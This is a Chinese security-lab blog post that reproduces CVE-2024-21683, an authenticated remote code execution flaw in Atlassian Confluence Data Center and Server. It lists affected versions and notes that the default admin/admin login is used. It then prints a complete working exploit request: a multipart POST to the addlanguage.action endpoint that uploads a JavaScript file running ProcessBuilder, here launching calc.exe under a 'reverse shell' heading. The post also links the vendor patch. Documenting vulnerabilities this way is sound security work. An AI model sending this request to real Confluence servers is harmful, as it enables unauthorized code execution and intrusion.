本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。
Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在远程代码执行问题,允许经过身份验证的攻击者执行任意代码。
1、 Data Center == 8.9.0
2、 8.8.0 <= Data Center <= 8.8.1
3、 8.7.0 <= Data Center <= 8.7.2
4、 8.6.0 <= Data Center <= 8.6.2
5、 8.5.0 <= Data Center <= 8.5.8 LTS
6、 8.4.0 <= Data Center <= 8.4.5
7、 8.3.0 <= Data Center <= 8.3.4
8、 8.2.0 <= Data Center <= 8.2.3
9、 8.1.0 <= Data Center <= 8.1.4
10、 8.0.0 <= Data Center <= 8.0.4
11、 7.20.0 <= Data Center <= 7.20.3
12、 7.19.0 <= Data Center <= 7.19.21 LTS
13、 7.18.0 <= Data Center <= 7.18.3
14、 7.17.0 <= Data Center <= 7.17.5
15、 8.5.0 <= Server <= 8.5.8 LTS
16、 8.4.0 <= Server <= 8.4.5
17、 8.3.0 <= Server <= 8.3.4
18、 8.2.0 <= Server <= 8.2.3
19、 8.1.0 <= Server <= 8.1.4
20、 8.0.0 <= Server <= 8.0.4
21、 7.20.0 <= Server <= 7.20.3
22、 7.19.0 <= Server <= 7.19.21 LTS
23、 7.18.0 <= Server <= 7.18.3
24、 7.17.0 <= Server <= 7.17.5
注:利用需要默认admin/admin登录
1.访问漏洞环境
2.对漏洞进行复现
POC (POST)
漏洞复现(反弹shell)
POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
Host: 172.17.151.129:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 459
Content-Type: multipart/form-data; boundary=690dd62eb49730d16f0a919d8736b152
--690dd62eb49730d16f0a919d8736b152
Content-Disposition: form-data; name="atl_token"
tockenxxxx
--690dd62eb49730d16f0a919d8736b152
Content-Disposition: form-data; name="newLanguageName"
test
--690dd62eb49730d16f0a919d8736b152
Content-Disposition: form-data; name="languageFile"; filename="exploit.js"
Content-Type: text/javascript
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
--690dd62eb49730d16f0a919d8736b152--
js执行payload
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://confluence.atlassian.com/pages/viewpage.action?pageId=1387867145
https://github.com/W01fh4cker/CVE-2024-21683-RCE
https://ti.qianxin.com/vulnerability/detail/353479
弥天简介
学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。
口号 网安引领时代,弥天点亮未来
知识分享完了
喜欢别忘了关注我们哦~
学海浩茫,
弥 天
安全实验室
原文始发于微信公众号(弥天安全实验室):【成功复现】Atlassian Confluence Center Server远程代码执行漏洞(CVE-2024-21683)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论